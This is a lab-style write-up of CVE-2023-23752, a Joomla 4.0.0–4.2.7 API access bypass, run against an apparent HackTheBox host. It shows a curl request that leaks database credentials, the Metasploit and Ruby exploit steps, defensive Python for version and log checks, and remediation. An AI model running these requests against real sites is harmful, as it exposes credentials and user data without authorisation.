Joomla versions between 4.0.0 and 4.2.7, inclusive, contain an improper API access vulnerability. This vulnerability allows unauthenticated users access to webservice endpoints which contain sensitive information. Specifically, for this module we exploit the users and config/application endpoints. This module was tested against Joomla 4.2.7 running on Docker.
CVE-2023-23752 is an authentication bypass resulting in an information leak. Most of the public exploits use the bypass to leak the system’s configuration, which contains the Joomla! MySQL database credentials in plaintext. The following demonstrates the leak:
- curl -v http://dev.devvortex.htb/api/index.php/v1/config/application?public=true
In the proof of concept above, the server responds with the credentials lewis:P4ntherg0t1n5r3c0n##, which are the credentials for our test Joomla! MySQL account.
Affected Products
Joomla! 4.0.0 – 4.2.7 (inclusive)
Identification
1. Scan Joomla using JoomScan script (https://github.com/OWASP/joomscan)
- joomscan --url http://dev.devvortex.htb
Note: If the reported version is between 4.0.0 and 4.2.7 (inclusive), the host can be assumed vulnerable.
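As an added example (not code from this write-up or from the tools it cites), the following Python checks a reported Joomla version against the 4.0.0 – 4.2.7 range and scans constructed web-server access-log lines for the public=true requests against the users and config/application endpoints described above, which is what a defender would look for when hunting for this bypass.

```python
"""Defender-side checks for CVE-2023-23752 (added example, not from the write-up or its tools)."""
import re

# Query parameter whose presence bypasses the API access check, per the write-up.
BYPASS_PARAM = "public=true"

# Request field of a combined-format access log: "METHOD /path?query HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')
# The two leaking endpoints the write-up names: users and config/application.
API_RE = re.compile(r"^/api/index\.php/v1/(?:config/application|users)(?:/|\?|$)")


def parse_version(version: str) -> tuple:
    """Turn '4.2.7' into (4, 2, 7). Assumes a plain dotted numeric string."""
    return tuple(int(part) for part in version.strip().split("."))


def is_affected(version: str) -> bool:
    """True when 4.0.0 <= version <= 4.2.7; tuples avoid '4.10' < '4.2' string-compare bugs."""
    return parse_version("4.0.0") <= parse_version(version) <= parse_version("4.2.7")


def is_suspicious_request(line: str) -> bool:
    """Flag a log line hitting a leaking API endpoint with the public=true bypass."""
    m = REQUEST_RE.search(line)
    if not m or not API_RE.match(m.group("path")):
        return False
    query = m.group("path").partition("?")[2]
    return BYPASS_PARAM in query.split("&")


def find_suspicious(lines: list) -> list:
    """Return only the log lines that look like CVE-2023-23752 probing."""
    return [ln for ln in lines if is_suspicious_request(ln)]


# Constructed sample log lines (not real traffic). Lines 1-2 are bypass attempts;
# line 3 is normal site traffic; line 4 hits the API without the bypass and is refused.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Jan/2024:10:01:02 +0000] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 200 1543',
    '203.0.113.5 - - [10/Jan/2024:10:01:03 +0000] "GET /api/index.php/v1/users?public=true HTTP/1.1" 200 812',
    '198.51.100.7 - - [10/Jan/2024:10:02:00 +0000] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 9123',
    '198.51.100.7 - - [10/Jan/2024:10:02:05 +0000] "GET /api/index.php/v1/config/application HTTP/1.1" 401 53',
]

if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG):
        print("CVE-2023-23752 indicator:", hit)
```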
Exploitation #1 (Metasploit)
1. We can use joomla_api_improper_access_checks to exploit this vulnerability
- use auxiliary/scanner/http/joomla_api_improper_access_checks
- show options
2. Now set the target host and port if required
- set RHOSTS dev.devvortex.htb
- run
Exploitation #2 (Script)
1. We can try another script (https://github.com/Acceis/exploit-CVE-2023-23752)
- git clone https://github.com/Acceis/exploit-CVE-2023-23752.git
- cd exploit-CVE-2023-23752
- ls
2. Install dependencies (OPTIONAL)
- gem install httpx docopt paint
3. Run the script help menu
- ruby exploit.rb -h
4. Run the script
- ruby exploit.rb http://dev.devvortex.htb
Remediation
Upgrade to the latest version of Joomla! CMS (4.2.8 or later), available from the Joomla! Web site.
Sources
https://vulncheck.com/blog/joomla-for-rce
https://exchange.xforce.ibmcloud.com/vulnerabilities/247706
https://packetstormsecurity.com/files/171474
https://www.mend.io/vulnerability-database/CVE-2023-23752
https://www.rapid7.com/db/modules/auxiliary/scanner/http/joomla_api_improper_access_checks/